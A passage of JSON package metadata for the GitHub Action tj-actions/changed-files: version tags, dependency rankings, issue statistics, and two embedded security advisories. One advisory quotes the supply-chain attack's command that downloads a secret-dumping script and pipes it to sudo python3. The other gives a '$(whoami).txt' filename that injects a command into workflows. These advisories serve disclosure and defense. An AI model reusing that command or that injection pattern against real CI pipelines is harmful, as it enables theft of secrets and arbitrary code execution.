ifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v6.3/manifests"},{"name":"v6","sha":"2ecd06deb6721d96fd1da0369fc6be39e974edba","kind":"commit","published_at":"2021-05-26T22:01:44.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v6","dependencies_parsed_at":"2023-07-20T14:17:30.446Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v6/manifests"},{"name":"v6.2","sha":"5fe8e4d60450bbe483ca011b747c4a972a79ef07","kind":"commit","published_at":"2021-05-25T04:30:19.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v6.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v6.2","dependencies_parsed_at":"2023-07-20T14:17:32.570Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v6.2/manifests"},{"name":"v6.1","sha":"7c66aa285d3ec22f1b8442b9a498ebb76ca5f57b","kind":"commit","published_at":"2021-05-16T19:43:33.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v6.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v6.1","dependencies_parsed_at":"2023-07-20T14:17:38.094Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v6.1/manifests"},{"name":"v5.3","sha":"e95bba87d2bd0b2bab4094abd9755a74f16703e6","kind":"commit","published_at":"2021-05-08T23:30:57.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v5.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v5.3","dependencies_parsed_at":"2023-07-20T14:17:34.054Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v5.3/manifests"},{"name":"v5.2","sha":"7852058eeee10d857e59ce41f3cb465a70c96ae0","kind":"commit","published_at":"2021-05-06T12:44:56.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v5.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v5.2","dependencies_parsed_at":"2023-07-20T14:17:35.087Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v5.2/manifests"},{"name":"v5.1","sha":"81f32e24026825ecfb7cb5d3951f91cfe788b0ad","kind":"commit","published_at":"2021-05-01T23:58:35.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v5.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v5.1","dependencies_parsed_at":"2023-07-20T14:17:33.486Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v5.1/manifests"},{"name":"v5","sha":"0e956bb09e9b05df440a2459a041cdec3cc0cc0c","kind":"commit","published_at":"2021-05-01T20:35:48.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v5","dependencies_parsed_at":"2023-07-20T14:17:32.590Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v5/manifests"},{"name":"v4.4","sha":"300e935beb285fcda513be84333e8726d5a544fb","kind":"commit","published_at":"2021-05-01T18:05:18.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.4","dependencies_parsed_at":"2023-07-20T14:17:30.415Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.4/manifests"},{"name":"v4.3","sha":"fcb2ab8c32c2b66fdf94ab3deede353f8fe6f77c","kind":"commit","published_at":"2021-05-01T16:11:02.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.3","dependencies_parsed_at":"2023-07-20T14:17:33.459Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.3/manifests"},{"name":"v4.2","sha":"271bbd60fedbc83dbb8cb00ce88bb4532d940e2f","kind":"commit","published_at":"2021-04-23T10:55:01.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.2","dependencies_parsed_at":"2023-07-20T14:17:30.942Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.2/manifests"},{"name":"v4.1","sha":"e8ace0110cd60a2a0a729d52078ad6cec839dbb9","kind":"commit","published_at":"2021-04-23T10:43:57.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4.1","dependencies_parsed_at":"2023-07-20T14:17:31.234Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4.1/manifests"},{"name":"v4","sha":"c061ef1fa3d028267a34edff2d42a34c8d56ec53","kind":"commit","published_at":"2021-04-23T10:22:08.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v4","dependencies_parsed_at":"2023-07-20T14:17:20.410Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v4/manifests"},{"name":"v3.3","sha":"489e2d514f3a230d66dbf74efec7ceed7b171703","kind":"commit","published_at":"2021-04-20T23:42:32.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v3.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v3.3","dependencies_parsed_at":"2023-07-20T14:17:35.066Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.3/manifests"},{"name":"v3.2","sha":"8d5a33c6034b0991a3fe85b2e73012a689eadf92","kind":"commit","published_at":"2021-04-11T21:59:11.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v3.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v3.2","dependencies_parsed_at":"2023-07-20T14:17:37.678Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.2/manifests"},{"name":"v3.1","sha":"fbfaba544e2ae235b2f88c936bcd5f8aa12419cc","kind":"commit","published_at":"2021-04-04T13:00:53.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v3.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v3.1","dependencies_parsed_at":"2023-07-20T14:17:20.907Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3.1/manifests"},{"name":"v3","sha":"e18ccae8fe477263087493451ea812d4d36faa4e","kind":"commit","published_at":"2021-04-02T13:06:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v3","dependencies_parsed_at":"2023-07-20T14:17:30.286Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v3/manifests"},{"name":"v2.1","sha":"e1d275d6d3255d6a586052675d3c5cef793edccf","kind":"commit","published_at":"2021-03-18T11:33:12.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v2.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v2.1","dependencies_parsed_at":"2023-07-20T14:17:33.329Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v2.1/manifests"},{"name":"v2","sha":"5eaa2d80dddfe7de6f7cc75fcaeb554851737685","kind":"commit","published_at":"2021-03-14T19:42:54.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v2","dependencies_parsed_at":"2023-07-20T14:17:35.031Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v2/manifests"},{"name":"v1","sha":"eef94236f6b9dec768f89dc72b9e0b64e13bb36e","kind":"commit","published_at":"2021-03-05T12:40:19.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1","dependencies_parsed_at":"2023-07-20T14:17:20.877Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1/manifests"}]},"repo_metadata_updated_at":"2026-09-16T02:40:49.794Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":6670,"rankings":{"downloads":null,"dependent_repos_count":0.2281730312153383,"dependent_packages_count":0.0,"stargazers_count":0.20282047219141183,"forks_count":0.40247187450483285,"docker_downloads_count":2.2373633338615115,"average":0.6141657423546188},"purl":"pkg:githubactions/tj-actions/changed-files","advisories":[{"uuid":"GSA_kwCzR0hTQS1tcnJoLWZ3ZzgtcjJjM84ABFfh","url":"https://github.com/advisories/GHSA-mrrh-fwg8-r2c3","title":"tj-actions changed-files through 45.0.7 allows remote attackers to discover secrets by reading actions logs.","description":"### Summary  \nA supply chain attack compromised the **tj-actions/changed-files** GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between **March 14 and March 15, 2025**, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.\n\nThis has been patched in [v46.0.1](https://github.com/tj-actions/changed-files/releases/tag/v46.0.1).\n\n### Details  \nThe attack involved modifying the **tj-actions/changed-files** GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs.  \n\n#### Key Indicators of Compromise (IoC):  \n- **Malicious commit**: [0e58ed8671d6b60d0890c21b07f8835ace038e67](https://github.com/tj-actions/changed-files/commit/0e58ed8671d6b60d0890c21b07f8835ace038e67)  \n- **Retroactively updated tags pointing to the malicious commit**:  \n  - `v1.0.0`: 0e58ed8671d6b60d0890c21b07f8835ace038e67  \n  - `v35.7.7-sec`: 0e58ed8671d6b60d0890c21b07f8835ace038e67  \n  - `v44.5.1`: 0e58ed8671d6b60d0890c21b07f8835ace038e67  \n\n#### Malicious Code Execution:  \nThe malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs:  \n```\nB64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`\n```\n\nThis script targeted the **Runner Worker process**, extracting and exfiltrating its memory contents.  \n\n### Proof of Concept (PoC)  \n#### Steps to Reproduce:  \n1. Create a GitHub Actions workflow using the **tj-actions/changed-files** action:  \n\n```yml\nname: \"tj-action changed-files incident\"\non:\n  pull_request:\n    branches:\n      - main\njobs:\n  changed_files:\n    runs-on: ubuntu-latest\n    steps:\n      - name: Get changed files\n        id: changed-files\n        uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67\n```\n2. Run the workflow and inspect the logs in the Actions tab.  \n3. Vulnerable workflows may display secrets in the logs.  \n\n#### Detection:  \nAnalyze network traffic using [Harden-Runner](https://github.com/step-security/harden-runner), which detects unauthorized outbound requests to:  \n- `gist.githubusercontent.com`  \n\nLive reproduction logs:  \n🔗 [Harden-Runner Insights](https://app.stepsecurity.io/github/step-security/github-actions-goat/actions/runs/13866127357)  \n\nThis attack was detected by **StepSecurity** when anomaly detection flagged an unauthorized outbound network call to `gist.githubusercontent.com`.  \n\n### Duration of Vulnerability  \nThe vulnerability was active between **March 14 and March 15, 2025**.  \n\n### Action Required  \n1. **Review your workflows executed between March 14 and March 15**:  \n   - Check the **changed-files** section for unexpected output.  \n   - Decode suspicious output using the following command:  \n     ```\n     echo 'xxx' | base64 -d | base64 -d\n     ```\n   - If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately.  \n\n2. **Update workflows referencing the compromised commit**:  \n   - If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version.  \n\n3. **Tagged versions**:  \n   - If you are using tagged versions (e.g., `v35`, `v44.5.1`), no action is required as these tags have been updated and are now safe to use.  \n\n4. **Rotate potentially exposed secrets**:  \n   - As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows.  \n\n### Impact  \n- **Type of vulnerability**: Supply chain attack, Secrets exposure, Information leakage  \n- **Who is impacted**:  \n  - Over 23,000 repositories using **tj-actions/changed-files**.  \n  - Organizations with public repositories are at the highest risk, as their logs may already be compromised.  \n- **Potential consequences**:  \n  - Theft of CI/CD secrets (API keys, cloud credentials, SSH keys).  \n  - Unauthorized access to source code, infrastructure, and production environments.  \n  - Credential leaks in public repositories, enabling further supply chain attacks.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-03-15T06:30:34.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://nvd.nist.gov/vuln/detail/CVE-2025-30066","https://github.com/tj-actions/changed-files/issues/2463","https://github.com/github/docs/blob/962a1c8dccb8c0f66548b324e5b921b5e4fbc3d6/content/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions.md?plain=1#L191-L193","https://semgrep.dev/blog/2025/popular-github-action-tj-actionschanged-files-is-compromised","https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised","https://github.com/chains-project/maven-lockfile/pull/1111","https://github.com/rackerlabs/genestack/pull/903","https://news.ycombinator.com/item?id=43367987","https://web.archive.org/web/20250315060250/https://github.com/tj-actions/changed-files/issues/2463","https://github.com/espressif/arduino-esp32/issues/11127","https://github.com/modal-labs/modal-examples/issues/1100","https://github.com/tj-actions/changed-files/issues/2464","https://github.com/tj-actions/changed-files/blob/45fb12d7a8bedb4da42342e52fe054c6c2c3fd73/README.md?plain=1#L20-L28","https://sysdig.com/blog/detecting-and-mitigating-the-tj-actions-changed-files-supply-chain-attack-cve-2025-30066","https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066","https://www.sweet.security/blog/cve-2025-30066-tj-actions-supply-chain-attack","https://www.stream.security/post/github-action-supply-chain-attack-exposes-secrets-what-you-need-to-know-and-how-to-respond","https://github.com/tj-actions/changed-files/issues/2477","https://github.com/tj-actions/changed-files/releases/tag/v46.0.1","https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-github-action-cve-2025-30066","https://blog.gitguardian.com/compromised-tj-actions","https://github.com/tj-actions/changed-files/security/advisories/GHSA-mw4p-6x4p-x5m5","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-30066","https://news.ycombinator.com/item?id=43368870","https://github.com/advisories/GHSA-mrrh-fwg8-r2c3"],"source_kind":"github","identifiers":["GHSA-mrrh-fwg8-r2c3","CVE-2025-30066"],"repository_url":"https://github.com/tj-actions/changed-files","blast_radius":1.0,"created_at":"2025-03-15T17:07:53.086Z","updated_at":"2025-10-22T19:29:01.000Z","epss_percentage":0.88385,"epss_percentile":0.99472,"packages":[{"ecosystem":"actions","package_name":"tj-actions/changed-files","versions":[{"first_patched_version":"46.0.1","vulnerable_version_range":"\u003c= 45.0.7"}],"purl":null}]},{"uuid":"GSA_kwCzR0hTQS1tY3BoLW0yNWotOGo2M84AA4Jm","url":"https://github.com/advisories/GHSA-mcph-m25j-8j63","title":"tj-actions/changed-files has Potential Actions command injection in output filenames (GHSL-2023-271)","description":"### Summary\nThe `tj-actions/changed-files` workflow allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets.\n\n### Details\nThe [`changed-files`](https://github.com/tj-actions/changed-files) action returns a list of files changed in a commit or pull request which provides an `escape_json` input [enabled by default](https://github.com/tj-actions/changed-files/blob/94549999469dbfa032becf298d95c87a14c34394/action.yml#L136), only escapes `\"` for JSON values. \n\nThis could potentially allow filenames that contain special characters such as `;` and \\` (backtick) which can be used by an attacker to take over the [GitHub Runner](https://docs.github.com/en/actions/using-github-hosted-runners/about-github-hosted-runners) if the output value is used in a raw fashion (thus being directly replaced before execution) inside a `run` block. By running custom commands an attacker may be able to steal **secrets** such as `GITHUB_TOKEN` if triggered on other events than `pull_request`. For example on `push`.\n\n#### Proof of Concept\n\n1. Submit a pull request to a repository with a new file injecting a command. For example `$(whoami).txt` which is a valid filename.\n2. Upon approval of the workflow (triggered by the pull request), the action will get executed and the malicious pull request filename will flow into the `List all changed files` step below.\n\n```yaml\n      - name: List all changed files\n        run: |\n          for file in ${{ steps.changed-files.outputs.all_changed_files }}; do\n            echo \"$file was changed\"\n          done\n```\n\nExample output:\n\n```yaml\n##[group]Run for file in $(whoami).txt; do\n    for file in $(whoami).txt; do\n        echo \"$file was changed\"\n    done\nshell: /usr/bin/bash -e {0}\n##[endgroup]\nrunner.txt was changed\n```\n\n### Impact\n\nThis issue may lead to arbitrary command execution in the GitHub Runner.\n\n### Resolution\n- A new `safe_output` input would be enabled by default and return filename paths escaping special characters like ;, ` (backtick), $, (), etc for bash environments.\n\n- A safe recommendation of using environment variables to store unsafe outputs.\n\n```yaml\n- name: List all changed files\n  env:\n    ALL_CHANGED_FILES: ${{ steps.changed-files.outputs.all_changed_files }}\n  run: |\n    for file in \"$ALL_CHANGED_FILES\"; do\n      echo \"$file was changed\"\n    done\n```\n\n### Resources\n\n* [Keeping your GitHub Actions and workflows secure Part 2: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input/)\n* [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-01-02T16:41:27.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/tj-actions/changed-files/security/advisories/GHSA-mcph-m25j-8j63","https://nvd.nist.gov/vuln/detail/CVE-2023-51664","https://github.com/tj-actions/changed-files/commit/0102c07446a3cad972f4afcbd0ee4dbc4b6d2d1b","https://github.com/tj-actions/changed-files/commit/716b1e13042866565e00e85fd4ec490e186c4a2f","https://github.com/tj-actions/changed-files/commit/ff2f6e6b91913a7be42be1b5917330fe442f2ede","https://github.com/advisories/GHSA-mcph-m25j-8j63"],"source_kind":"github","identifiers":["GHSA-mcph-m25j-8j63","CVE-2023-51664"],"repository_url":"https://github.com/tj-actions/changed-files","blast_radius":1.0,"created_at":"2024-01-02T17:05:56.627Z","updated_at":"2024-01-04T19:43:41.000Z","epss_percentage":0.00673,"epss_percentile":0.7053,"packages":[{"ecosystem":"actions","package_name":"tj-actions/changed-files","versions":[{"first_patched_version":"41","vulnerable_version_range":"\u003c 41"}],"purl":null}]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/actions/tj-actions/changed-files","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/actions/tj-actions/changed-files","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/actions/tj-actions/changed-files/dependencies","status":null,"funding_links":["https://github.com/sponsors/jackton1","https://opencollective.com/tj-actions"],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-13T06:51:25.108Z","issues_count":160,"pull_requests_count":1982,"avg_time_to_close_issue":2064175.111111111,"avg_time_to_close_pull_request":50775.43404255319,"issues_closed_count":144,"pull_requests_closed_count":1880,"pull_request_authors_count":33,"issue_authors_count":137,"avg_comments_per_issue":3.7375,"avg_comments_per_pull_request":0.19677093844601412,"merged_pull_requests_count":1663,"bot_issues_count":4,"bot_pull_requests_count":1380,"past_year_issues_count":8,"past_year_pull_requests_count":82,"past_year_avg_time_to_close_issue":1957142.5,"past_year_avg_time_to_close_pull_request":444925.58490566036,"past_year_issues_closed_count":2,"past_year_pull_requests_closed_count":53,"past_year_pull_request_authors_count":7,"past_year_issue_authors_count":6,"past_year_avg_comments_per_issue":0.375,"past_year_avg_comments_per_pull_request":1.3170731707317074,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":75,"past_year_merged_pull_requests_count":14,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/issues","maintainers":[{"login":"jackton1","count":158,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jackton1"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/github%20actions/packages/tj-actions%2Fchanged-files/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/github%20actions/packages/tj-actions%2Fchanged-files/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/github%20actions/packages/tj-actions%2Fchanged-files/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/github%20actions/packages/tj-actions%2Fchanged-files/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/github%20actions/packages/tj-actions%2Fchanged-files/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/github%20actions/packages/tj-actions%2Fchanged-files/codemeta","maintainers":[]}